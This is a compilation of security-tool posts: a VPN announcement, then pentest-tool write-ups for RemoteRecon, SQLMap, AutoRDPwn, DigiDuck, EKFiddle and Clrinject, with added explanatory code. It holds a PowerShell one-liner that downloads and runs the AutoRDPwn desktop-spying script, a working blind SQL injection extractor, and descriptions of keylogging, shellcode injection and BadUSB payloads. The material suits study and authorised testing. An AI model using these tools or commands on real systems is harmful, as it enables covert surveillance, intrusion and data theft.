Webroot WiFi Security: Expanding Our Commitment to Security & Privacy

For the past 20 years, Webroot’s technology has been driven by our dedication to protecting users from malware, viruses, and other online threats. The release of Webroot® WiFi Security—a new virtual private network (VPN) app for phones, computers, and tablets—is the next step in fulfilling our commitment to protect everyone’s right to be secure in […]

Link: https://www.webroot.com/blog/2018/10/17/webroot-wifi-security-expanding-our-commitment-to-security-privacy/

RemoteRecon – Remote Recon And Collection

RemoteRecon provides the ability to execute post-exploitation capabilities against a remote host without having to expose your complete toolkit/agent. Often, as operators, we need to compromise a host just so we can keylog or screenshot (or perform some other minor task) against a person/host of interest. Why should you have to push Beacon, Empire, Innuendo, Meterpreter, or a custom RAT to the target? Doing so increases the footprint you have in the target environment and exposes functionality in your agent and, most likely, your C2 infrastructure. An alternative is to deploy a secondary agent to targets of interest, collect intelligence, and store that data for retrieval at your discretion. If these compromised endpoints are discovered by IR teams, you lose those endpoints and the information you’ve collected, but nothing more.

[Figure: diagram of how an adversary would use RemoteRecon; the image is not included here.]

RemoteRecon uses the registry for data storage, with WMI as an internal C2 channel. All commands are executed in an asynchronous, push-and-pull manner: you send commands via the PowerShell controller and then retrieve the results of each command from the registry. All results are displayed in the local console.

Current capabilities:
• PowerShell
• Screenshot
• Token impersonation
• Inject reflective DLL (the DLL must export Stephen Fewer’s ReflectiveLoader function)
• Inject shellcode
• Keylog

Improvements, additions, to-dos:
• Dynamically load and execute .NET assemblies
• Support non-reflective DLLs for injection

Build dependencies:
The RemoteRecon.ps1 script already contains a fully weaponized JS payload for the agent. The payload will only be updated as the code base changes. If you wish to make changes to the codebase on your own, there are a few dependencies required:
• Visual Studio 2015+
• Windows 7 and .NET SDK
• Windows 8.1 SDK
• mscorlib.tlh (included in the project, but there are instances where IntelliSense can’t seem to find it)
• .NET 3.5 & 4
• James Forshaw’s DotNetToJScript project
• Fody/Costura NuGet package (packages and embeds any extra dependencies in .NET)

For a short setup guide, please visit the wiki.

Download RemoteRecon

Link: http://feedproxy.google.com/~r/PentestTools/~3/yXXX3vBqgJk/remoterecon-remote-recon-and-collection.html

SQLMap v1.2.10 – Automatic SQL Injection And Database Takeover Tool

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
• Support to dump database tables entirely, a range of entries or specific columns as per the user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like name and pass.
• Support to download and upload any file from the database server’s underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server’s underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server’s underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per the user’s choice.
• Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

Installation
You can download the latest tarball or zipball from the links below. Preferably, download sqlmap by cloning the Git repository:

    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage
To get a list of basic options and switches use:

    python sqlmap.py -h

To get a list of all options and switches use:

    python sqlmap.py -hh

A sample run is available on the project site. To get an overview of sqlmap capabilities, the list of supported features and a description of all options and switches, along with examples, you are advised to consult the user’s manual.

Links
• Homepage: http://sqlmap.org
• Download: .tar.gz or .zip
• Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
• Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
• User’s manual: https://github.com/sqlmapproject/sqlmap/wiki
• Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
• Twitter: @sqlmap
• Demos: http://www.youtube.com/user/inquisb/videos
• Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

Translations of this README are available in Bulgarian, Chinese, Croatian, French, Greek, Indonesian, Italian, Japanese, Portuguese, Spanish and Turkish.

Download SQLMap v1.2.10
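To make the boolean-based blind technique in the feature list concrete, here is an added example that is not part of sqlmap or its documentation: a deliberately vulnerable lookup against a constructed in-memory SQLite database, its parameterized counterpart, and a small extractor that recovers a value one bit per request through the true/false oracle the vulnerable lookup leaks. The table, rows, function names and the `unicode()`/`substr()` probe are all this example’s own choices.

```python
import sqlite3

# Constructed target: an in-memory SQLite database standing in for the
# application's backend. Sample rows only; nothing here comes from a real system.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
_conn.executemany("INSERT INTO users (name, secret) VALUES (?, ?)",
                  [("alice", "s3cr3t"), ("bob", "hunter2")])


def vulnerable_lookup(name):
    """Deliberately vulnerable endpoint: the parameter is concatenated into
    the query. The caller only learns whether a row came back, which is the
    one-bit oracle that boolean-based blind injection needs."""
    cur = _conn.execute("SELECT id FROM users WHERE name = '" + name + "'")
    return cur.fetchone() is not None


def safe_lookup(name):
    """Hardened form of the same endpoint: a bound parameter, so the payload
    is compared as a literal string and never parsed as SQL."""
    cur = _conn.execute("SELECT id FROM users WHERE name = ?", (name,))
    return cur.fetchone() is not None


def blind_extract(oracle, subquery, known_name="alice", max_len=64):
    """Recover the single-column result of `subquery` through a true/false
    oracle, one bit per request: "is bit b of character p set?".
    Returns (recovered_string, number_of_requests)."""
    recovered = ""
    requests = 0
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(6, -1, -1):  # 7 bits cover printable ASCII
            payload = (
                f"{known_name}' AND (unicode(substr(({subquery}), {pos}, 1)) "
                f"& {1 << bit}) > 0 -- "
            )
            requests += 1
            if oracle(payload):
                code |= 1 << bit
        if code == 0:
            # substr() past the end of the string yields '' and unicode('')
            # is NULL, so no bit ever tests true: end of string reached.
            break
        recovered += chr(code)
    return recovered, requests


if __name__ == "__main__":
    target = "SELECT secret FROM users WHERE name = 'bob'"
    value, n = blind_extract(vulnerable_lookup, target)
    print(f"vulnerable endpoint leaked {value!r} in {n} requests")
    value, n = blind_extract(safe_lookup, target)
    print(f"parameterized endpoint leaked {value!r} in {n} requests")
```

Against the vulnerable endpoint the extractor recovers bob’s secret in seven requests per character plus seven to detect the end of the string; against the parameterized endpoint every probe is just a name that does not exist, so nothing leaks. sqlmap’s `--technique=B` switch restricts it to this same class of attack, with a bisection search over the character range in place of the per-bit probing shown here.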

Link: http://www.kitploit.com/2018/10/sqlmap-v1210-automatic-sql-injection.html

AutoRDPwn – The Shadow Attack Framework

AutoRDPwn is a script created in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. This weakness allows a remote attacker to view the victim’s desktop without their consent, and even control it on request. For correct operation, the requirements described in the user guide must be met.

Requirements
PowerShell 5.0 or higher

Changes
Version 4.0
• Fixed a bug in the scheduled task that removes the AutoRDPwn user
• The Scheduled Task attack has been replaced by Invoke-Command
• It is now possible to choose the language of the application and launch the attack on English versions of Windows
The rest of the changes can be consulted in the CHANGELOG file.

Use
Execution in one line:

    powershell -ExecutionPolicy Bypass "cd $env:TEMP; iwr https://goo.gl/HSkAXP -Outfile AutoRDPwn.ps1; .\AutoRDPwn.ps1"

Note that this one-liner bypasses the execution policy and runs whatever the shortened URL currently resolves to; download and review the script before executing it on any machine you are responsible for.

The detailed guide of use can be found at the following link: https://darkbyte.net/autordpwn-la-guia-definitiva

Credits and Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• Stas’M Corp. for its tool RDP Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his tool Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz

Contact
This software does not offer any kind of guarantee. Its use is exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it. For more information, you can contact info@darkbyte.net.

Download AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/FJO5eg5Xcpk/autordpwn-shadow-attack-framework.html

DigiDuck Framework – Framework For Digiduck Development Boards Running ATTiny85 Processors And Micronucleus Bootloader

Framework for Digiduck development boards running ATtiny85 processors and the micronucleus bootloader.

Roadmap
Plan to implement a command for Duckyspark translation within the framework.

Requirements
• ATtiny85 or other compatible “Digispark” development board(s)
• Digispark drivers (if you can use the board with Arduino you should be fine)
• OSX or MacOS
• Arduino IDE with the Digispark library installed

Getting Started

Installation
DigiDuck Framework (referred to as DDF) is really simple to set up. There are no third-party modules required for DDF; all you need is Python 3.6+ (I used this to develop it, but it should hopefully be backwards compatible). Clone this repository and enter the directory from the command line. Once inside the directory simply run:

    python start.py

This will start the program and display the welcome screen (screenshot not included here).

Help menu
There are three commands in this framework. I wanted to make this as lightweight as possible, so it only requires one command to get a payload onto your board.

Command: help
The help command displays the help menu (screenshot not included here).

Command: show
The show command displays the list of available payloads (screenshot not included here). They are displayed again when you run the execute command.

Execution
The third and last command in DDF is execute. The execute command displays the same menu as the show command, but from this menu you input the payload name. You have to include .hex at the end of it, or it won’t load correctly and will ask you to enter it again.

Once you choose your payload you will be prompted to insert your board into the computer. From there it will install the desired payload and report when it has completed. That’s it! You can now plug your BadUSB Digispark board into a computer and run the desired payload.

Payloads
Payloads are Digispark .ino hex files that are installed to your ATtiny85 or other board using the micronucleus bootloader.

Current payloads
All the current payloads are from Hak5’s Rubber Ducky scripts (see Credits). If you are unsure of what a payload may do, that is the place to go read about it. I’ll try to keep the payloads close to the same name, but I don’t want you on Windows to be typing out too much since rlcompleter doesn’t work.

Creating a payload
Head to the Duckyspark GitHub page (https://github.com/toxydose/Duckyspark) to see how to create your translated .ino file from a Rubber Ducky script. After that, load your .ino file into the Arduino IDE. Make sure verbose output is on inside Preferences and compile your code. Open the terminal output below and look for the .hex file location. It should be in a temp directory in your AppData or the equivalent on macOS; in the verbose output it appears right above the line that tells you to plug in your board. Pull the payloadname.cpp.hex file from that folder and drag it into payloads inside the DDF framework. Run the program and your payload will be listed under Available Payloads.

Feel free to contribute by adding custom or more payloads from the Rubber Ducky scripts above. Make a PR with the new payloads.

Credits
• Duckyspark: https://github.com/toxydose/Duckyspark
• Micronucleus: https://github.com/micronucleus/micronucleus
• Hak5 Rubber Ducky payloads: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Download DigiDuck-Framework
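The .cpp.hex file the Arduino IDE produces is Intel HEX, and DDF hands it straight to micronucleus. A check worth running before a flash cycle is that every record’s checksum is intact and that the image fits in the flash the bootloader leaves free. The following is an added example, not part of DigiDuck Framework, micronucleus or the Arduino toolchain: a small Intel HEX parser with checksum verification and a size check. The sample records are constructed for the example, and the 6012-byte user-flash budget is an assumption (it depends on the micronucleus build on the board), not a figure taken from either project.

```python
import re

ATTINY85_FLASH = 8192  # bytes of flash on the ATtiny85

# micronucleus keeps part of the flash for itself, so a payload gets less than
# the full 8 KB. The exact figure depends on the bootloader build; this budget
# is an assumption for the example, not a value taken from DDF or micronucleus.
ASSUMED_USER_FLASH = 6012

# Constructed Intel HEX sample (two data records plus EOF), not an actual
# Digispark payload.
SAMPLE_HEX = """\
:10010000214601360121470136007EFE09D2190140
:100110002146017E17C20001FF5F16002148011928
:00000001FF
"""

_RECORD = re.compile(r"^:[0-9A-Fa-f]{10,}$")


def parse_ihex(text):
    """Parse Intel HEX into {address: byte}, verifying the length field and
    checksum of every record. Raises ValueError on any corruption, which is
    what you want before a flash cycle rather than after it."""
    image = {}
    base = 0          # set by extended segment / linear address records
    saw_eof = False
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        if not _RECORD.match(line) or len(line) % 2 == 0:
            raise ValueError(f"line {lineno}: malformed record")
        if saw_eof:
            raise ValueError(f"line {lineno}: data after EOF record")
        raw = bytes.fromhex(line[1:])
        length, rtype, data = raw[0], raw[3], raw[4:-1]
        addr = int.from_bytes(raw[1:3], "big")
        if len(data) != length:
            raise ValueError(f"line {lineno}: length field {length} but {len(data)} data bytes")
        # The checksum byte is the two's complement of the sum of the other
        # bytes, so a valid record sums to 0 modulo 256.
        if sum(raw) & 0xFF:
            raise ValueError(f"line {lineno}: checksum mismatch")
        if rtype == 0x00:                       # data record
            for i, b in enumerate(data):
                image[base + addr + i] = b
        elif rtype == 0x01:                     # end of file
            saw_eof = True
        elif rtype == 0x02:                     # extended segment address
            base = int.from_bytes(data, "big") << 4
        elif rtype == 0x04:                     # extended linear address
            base = int.from_bytes(data, "big") << 16
        else:
            raise ValueError(f"line {lineno}: unsupported record type {rtype:#04x}")
    if not saw_eof:
        raise ValueError("missing EOF record")
    return image


def check_payload(text, budget=ASSUMED_USER_FLASH):
    """Size the image the way the bootloader sees it: from address 0 up to
    the highest byte written, gaps included."""
    image = parse_ihex(text)
    size = max(image) + 1 if image else 0
    return {"size": size, "bytes_written": len(image), "fits": size <= budget}


if __name__ == "__main__":
    print(check_payload(SAMPLE_HEX))
```

Run it over the .cpp.hex you copied into the payloads folder; a checksum error means the file was truncated or edited, and a `fits` of False means micronucleus will refuse it or overwrite itself, depending on the bootloader version.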

Link: http://feedproxy.google.com/~r/PentestTools/~3/W2pYkIn97a4/digiduck-framework-framework-for.html

EKFiddle v.0.8.2 – A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General

A framework based on the Fiddler web debugger to study exploit kits, malvertising and malicious traffic in general.

Installation
1. Download and install the latest version of Fiddler: https://www.telerik.com/fiddler
   Special instructions for Linux and Mac:
   https://www.telerik.com/blogs/fiddler-for-linux-beta-is-here
   https://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1
2. Enable C# scripting (Windows only): launch Fiddler, go to Tools -> Options and, in the Scripting tab, change the default (JScript.NET) to C#.
3. Change the default text editor (optional): in the same Tools -> Options menu, click on the Tools tab and set one of:
   Windows: notepad.exe or notepad++.exe
   Linux: gedit
   Mac: /Applications/TextEdit.app or /Applications/TextWrangler.app
4. Close Fiddler.
5. Download or clone CustomRules.cs into the appropriate folder for your operating system:
   Windows (7/10): C:\Users\[username]\Documents\Fiddler2\Scripts\
   Ubuntu: /home/[username]/Fiddler2/Scripts/
   Mac: /Users/[username]/Fiddler2/Scripts/
6. Finish up the installation: start Fiddler to complete the installation of EKFiddle. That’s it, you’re all set!

Features

Toolbar buttons
The added toolbar buttons give you quick shortcuts to some of the main features:
• QuickSave: dumps the current web sessions into a SAZ named QuickSave-“MM-dd-yyyy-HH-mm-ss”.saz in EKFiddle\Captures.
• UI mode: toggles between the default column view and extra columns with additional information (time stamp, server IP and type, method, etc.).
• VPN: a VPN GUI built directly into Fiddler. It uses the OpenVPN client on Windows and Linux with .ovpn files (signing up with a commercial VPN provider may be required). It opens a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous one to ensure only one TAP adapter is used at any given time.
  Windows: download and install OpenVPN in the default directory, then place your .ovpn files inside OpenVPN’s config folder.
  Linux (tested on Ubuntu 16.04): sudo apt-get install openvpn, then place your .ovpn files in /etc/openvpn.
• Proxy: lets you connect to an upstream proxy (HTTP/S or SOCKS).
• Import SAZ/PCAP: a shortcut to load SAZ (Fiddler’s native format) or PCAP (e.g. from Wireshark) captures.
• View/Edit Regexes: view and create your custom regular expressions. A master list is provided with auto-updates via GitHub; the custom list lets you add your own rules. There are 4 types of indicators to match on:
  URI (full or partial URI match)
  IP (single IP address or IP range)
  SourceCode (response body)
  Headers (any value within a response’s headers)
  Syntax (important: the fields are TAB delimited; the tabs are shown as spaces below):
    URI         My_URI_rule          [a-z0-9]{2}                  Match URI
    IP          My_IP_address_rule   5\.154\.191\.67              Match static IP address
    IP          My_IP_address_rule   5\.154\.191\.(6[0-9]|70)     Match an IP range
    SourceCode  My_sourcecode_rule   vml=1                        Look for specific string
    Headers     My_headers_rule      nginx                        Look for specific string
• Run Regexes: runs the master and custom regular expressions against the current web sessions.
• Clear Markings: clears any comment and colour highlighting in the currently loaded sessions.

ContextAction menu
The ContextAction menu (accessed by right-clicking on any session(s)) allows you to perform additional commands on the selected sessions. This can be very helpful for quick lookups, computing hashes or extracting IOCs.
• Hostname or IP address (Google Search, RiskIQ, URLQuery): queries the hostname for the currently selected session.
• URI
  Build Regex: creates a regular expression from the currently selected URI. This action opens up a regex website, and the URI is already in the clipboard, ready to be pasted into the query field.
  Open in... Internet Explorer, Chrome, Firefox, Edge: opens the URI with the browser you selected.
• Response Body
  Remove encoding: decodes the currently selected sessions (from their basic encoding).
  Build Regex: creates a regular expression from the currently selected session’s source code. This action opens up a regex website, and the URI is already in the clipboard, ready to be pasted into the query field.
  Calculate MD5/SHA256 hash: takes the current session’s body and computes its hash.
  Hybrid Analysis / VirusTotal lookup: hashes the current session’s body, then looks up that hash.
  Extract to Disk: saves the currently selected session(s)’ body to disk, into the ‘Artifacts’ folder.
  Extract IOCs: copies basic information from the selected sessions into memory so that it can be shared as IOCs.
  Extract Coinhive site keys
• Connect-the-dots: allows you to identify the sequence of events between sessions. Right-click on the session you are interested in retracing your steps to and simply ‘connect the dots’. It will label the sequence of events from 01 to n within the Comments column. You can reorder that column to have a condensed view of the sequence.
• Crawler (experimental): load a list of URLs from a text file and let the browser automatically visit them: Tools -> Crawler (experimental) -> Start crawler. May require some tweaks in your browser’s settings, in particular with regard to crash recovery.

Uninstalling EKFiddle
Delete CustomRules.cs.

Download EKFiddle
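The four indicator types and the TAB-delimited rule syntax above are easiest to reason about with a matcher in hand. The following is an added example written for this page, not EKFiddle’s own code (EKFiddle’s rules run in C# inside Fiddler): it parses rules in the Type, Name, Regex layout, runs them over a few constructed sessions, and returns the rule names that would land in the Comments column. Treating a fourth field as a comment, the session dictionary layout and anchoring IP rules with `fullmatch` are choices of this example; the URI pattern is also narrowed from the page’s `[a-z0-9]{2}` so it does not match every session.

```python
import re

RULE_TYPES = ("URI", "IP", "SourceCode", "Headers")

# Constructed rule list in the TAB-delimited layout described above:
# Type<TAB>Name<TAB>Regex, with anything after a third TAB treated as a
# comment (an assumption of this example, not EKFiddle's behaviour).
SAMPLE_RULES = "\n".join([
    "URI\tMy_URI_rule\t/[a-z0-9]{8}\\.php\\?",
    "IP\tMy_IP_address_rule\t5\\.154\\.191\\.(6[0-9]|70)\tMatch an IP range",
    "SourceCode\tMy_sourcecode_rule\tvml=1\tLook for specific string",
    "Headers\tMy_headers_rule\tnginx\tLook for specific string",
    "# comment lines and blank lines are skipped",
    "",
])

# Constructed sessions standing in for captured Fiddler sessions.
SAMPLE_SESSIONS = [
    {"id": 1, "uri": "http://example.test/ads/banner.js", "ip": "203.0.113.10",
     "headers": {"Server": "Apache"}, "body": "console.log('hi');"},
    {"id": 2, "uri": "http://landing.test/gate/ab12cd34.php?q=1", "ip": "5.154.191.67",
     "headers": {"Server": "nginx/1.10", "Content-Type": "text/html"},
     "body": '<html><body onload="vml=1"></body></html>'},
    {"id": 3, "uri": "http://cdn.test/lib.js", "ip": "5.154.191.200",
     "headers": {"Server": "cloudflare"}, "body": ""},
]


def parse_rules(text):
    """Parse rule lines into (type, name, compiled_regex) tuples, rejecting
    anything that is not Type<TAB>Name<TAB>Regex with a known type."""
    rules = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) < 3 or fields[0] not in RULE_TYPES or not fields[1]:
            raise ValueError(f"rule line {lineno}: expected Type<TAB>Name<TAB>Regex, got {line!r}")
        try:
            regex = re.compile(fields[2])
        except re.error as exc:
            raise ValueError(f"rule line {lineno}: bad regex {fields[2]!r}: {exc}") from exc
        rules.append((fields[0], fields[1], regex))
    return rules


def _haystack(rule_type, session):
    """Select the part of a session that a rule type is matched against."""
    if rule_type == "URI":
        return session["uri"]
    if rule_type == "IP":
        return session["ip"]
    if rule_type == "SourceCode":
        return session["body"]
    # Headers: "Name: value" lines, so a rule can target a name or a value
    return "\n".join(f"{k}: {v}" for k, v in session["headers"].items())


def rule_matches(rule, session):
    rule_type, _name, regex = rule
    text = _haystack(rule_type, session)
    if rule_type == "IP":
        # Anchor IP rules to the whole address: an unanchored 5\.154\.191\.6
        # would otherwise also flag 5.154.191.60 through 5.154.191.69.
        return regex.fullmatch(text) is not None
    return regex.search(text) is not None


def run_rules(rules, sessions):
    """Return {session_id: [matching rule names, in rule order]}, the
    equivalent of the labels EKFiddle writes into the Comments column."""
    hits = {}
    for session in sessions:
        hits[session["id"]] = [rule[1] for rule in rules if rule_matches(rule, session)]
    return hits


if __name__ == "__main__":
    for sid, names in run_rules(parse_rules(SAMPLE_RULES), SAMPLE_SESSIONS).items():
        print(sid, names or "-")
```

Only the second session trips all four rule types; the third has an address in the same /24 that the range regex does not cover, which is exactly the case an unanchored IP match would get wrong.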

Link: http://feedproxy.google.com/~r/PentestTools/~3/gKB5SbwjRek/ekfiddle-v082-framework-based-on.html

Clrinject – Injects C# EXE Or DLL Assembly Into Every CLR Runtime And AppDomain Of Another Process

Injects a C# EXE or DLL assembly into any CLR runtime and AppDomain of another process. The injected assembly can then access static instances of the injectee process’s classes and therefore affect its internal state.

Usage
    clrinject-cli.exe -p <processId>|<processName> -a <assemblyFile>
Opens the process with id <processId> or name <processName>, injects the <assemblyFile> EXE and executes its Main method.

Additional options
-e                            Enumerates all loaded CLR runtimes and created AppDomains.
-d <#>                        Inject only into the <#>-th AppDomain. If no number or zero is specified, the assembly is injected into every AppDomain.
-i <namespace>.<className>    Create an instance of class <className> from namespace <namespace>.

Examples
    clrinject-cli.exe -p victim.exe -e
(Enumerate runtimes and AppDomains from victim.exe)
    clrinject-cli.exe -p 1234 -a "C:\Path\To\invader.exe" -d 2
(Inject invader.exe into the second AppDomain of the process with id 1234)
    clrinject-cli.exe -p victim.exe -a "C:\Path\To\invader.dll" -i "Invader.Invader"
(Create an instance of Invader inside every AppDomain in victim.exe)
    clrinject-cli64.exe -p victim64.exe -a "C:\Path\To\invader64.exe"
(Inject an x64 assembly into an x64 process; the injector, the assembly and the target process must all be the same bitness)

Injectable assembly example
The following code can be compiled as a C# executable and then injected into a PowerShell process. It accesses static instances of internal PowerShell classes to change the console text colour to green.

    using System;
    using System.Reflection;
    using Microsoft.PowerShell;
    using System.Management.Automation.Host;

    namespace Invader
    {
        class Invader
        {
            static void Main(string[] args)
            {
                try
                {
                    // Resolve the host assembly through a public type it exports,
                    // then reach the non-public ConsoleHost singleton via reflection.
                    var powerShellAssembly = typeof(ConsoleShell).Assembly;
                    var consoleHostType = powerShellAssembly.GetType("Microsoft.PowerShell.ConsoleHost");
                    var consoleHost = consoleHostType
                        .GetProperty("SingletonInstance", BindingFlags.Static | BindingFlags.NonPublic)
                        .GetValue(null);

                    // The host's UI object exposes the console colours through RawUI.
                    var ui = (PSHostUserInterface)consoleHostType.GetProperty("UI").GetValue(consoleHost);
                    ui.RawUI.ForegroundColor = ConsoleColor.Green;
                }
                catch (Exception e)
                {
                    // Runs inside the target process, so report to its console rather than crashing it.
                    Console.WriteLine(e.ToString());
                }
            }
        }
    }

Injection command:
    clrinject-cli64.exe -p powershell.exe -a "C:\Path\To\invader64.exe"

Result: (screenshot not included here)

Download Clrinject

Link: http://feedproxy.google.com/~r/PentestTools/~3/pK8N-dwlNI8/clrinject-injects-c-exe-or-dll-assembly.html